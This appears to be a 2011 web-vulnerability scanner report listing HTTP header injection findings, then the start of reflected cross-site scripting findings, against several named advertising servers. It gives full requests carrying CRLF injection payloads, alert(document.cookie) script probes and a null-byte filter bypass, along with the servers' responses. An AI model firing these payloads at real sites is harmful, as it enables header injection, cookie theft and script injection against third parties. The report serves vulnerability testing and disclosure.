Request
GET /6c73c%0d%0a2b896a07724/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c73c
2b896a07724/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1:
Date: Thu, 10 Mar 2011 16:40:03 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 7fb28%0d%0a5d755171d05 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7fb28%0d%0a5d755171d05/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7fb28
5d755171d05/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5:
Date: Thu, 10 Mar 2011 16:40:56 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2c10d%0d%0ab8b8b321907 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2c10d%0d%0ab8b8b321907/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.organicgardening.com/?cm_sp=Network%20Banner-_-OG-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c10d
b8b8b321907/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5:
Date: Thu, 10 Mar 2011 16:45:07 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3a618%0d%0abf6e70eb76b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3a618%0d%0abf6e70eb76b/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3a618
bf6e70eb76b/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130:
Date: Thu, 10 Mar 2011 16:40:05 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 11bac%0d%0acea0052660f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /11bac%0d%0acea0052660f/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11bac
cea0052660f/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100:
Date: Thu, 10 Mar 2011 22:23:23 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 62f9f%0d%0a36bce5cafc7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62f9f%0d%0a36bce5cafc7/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.rodale.com/benefits-walking?4bec2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eec68e81f22b=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62f9f
36bce5cafc7/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120:
Date: Thu, 10 Mar 2011 22:18:52 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 89a70%0d%0a4a192a08534 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /89a70%0d%0a4a192a08534/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/89a70
4a192a08534/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540:
Date: Thu, 10 Mar 2011 22:19:51 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 113c7%0d%0a6798c3251f0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /113c7%0d%0a6798c3251f0/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/113c7
6798c3251f0/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700:
Date: Thu, 10 Mar 2011 16:40:03 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3b862%0d%0a8ca34c13755 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /dot.gif3b862%0d%0a8ca34c13755?8285523 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif3b862
8ca34c13755:
Date: Thu, 10 Mar 2011 16:42:30 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5fcd0%0d%0af26994b0bbc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5fcd0%0d%0af26994b0bbc;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g%3fhttp://s0.2mdn.net/2521530/2017187_menopause_1.jpg HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5fcd0
f26994b0bbc;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g:
Date: Thu, 10 Mar 2011 16:40:33 GMT
Server: GFE/2.0
The value of the ES cookie is copied into the Set-Cookie response header. The payload b94cd%0d%0a0acdc94cdfa was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/3/885674/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5Bb94cd%0d%0a0acdc94cdfa
The value of the ES cookie is copied into the Set-Cookie response header. The payload da28e%0d%0af59a7dd42e was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/3/885678/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=da28e%0d%0af59a7dd42e
The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b893%0d%0a01a1d42b0c5 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/3/885679/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=9b893%0d%0a01a1d42b0c5
The value of the ES cookie is copied into the Set-Cookie response header. The payload be7bc%0d%0a63bff395090 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adsc/d876089/8/40909683/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=be7bc%0d%0a63bff395090
The value of the code request parameter is copied into the Location response header. The payload a8ca6%0d%0aab57d3e3f43 was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=876089&site=60649346&code=40909683a8ca6%0d%0aab57d3e3f43&randnum=6149086 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g
The value of the site request parameter is copied into the Location response header. The payload b4fec%0d%0a280adc6526b was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=876089&site=b4fec%0d%0a280adc6526b&code=40909683&randnum=6149086 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g
The value of the code request parameter is copied into the Location response header. The payload d3db1%0d%0abd31793905f was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/sta.php?survey_num=876089&site=2285373&code=d3db1%0d%0abd31793905f&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B
The value of the site request parameter is copied into the Location response header. The payload 308d0%0d%0a7110d05c4d2 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/sta.php?survey_num=876089&site=308d0%0d%0a7110d05c4d2&code=4699231&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B
The value of the flv request parameter is copied into the Set-Cookie response header. The payload c6825%0d%0a63ad61cc419 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=c6825%0d%0a63ad61cc419&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload b49be%0d%0a4750443b61 was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=0&res=b49be%0d%0a4750443b61 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=b49be
4750443b61&WMPV=0; expires=Wed, 08-Jun-2011 12:23:58 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d71c%0d%0a42293c12f4c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=4d71c%0d%0a42293c12f4c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1402&BWDate=40612.379687&debuglevel=&FLV=10.2154&RES=128&WMPV=4d71c
42293c12f4c; expires=Wed, 08-Jun-2011 12:23:57 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0
2. Cross-site scripting (reflected)
There are 1086 instances of this issue:
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0055ee3'-alert(1)-'9f815ea7f25 was submitted in the adurl parameter. This input was echoed as 55ee3'-alert(1)-'9f815ea7f25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=%0055ee3'-alert(1)-'9f815ea7f25 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
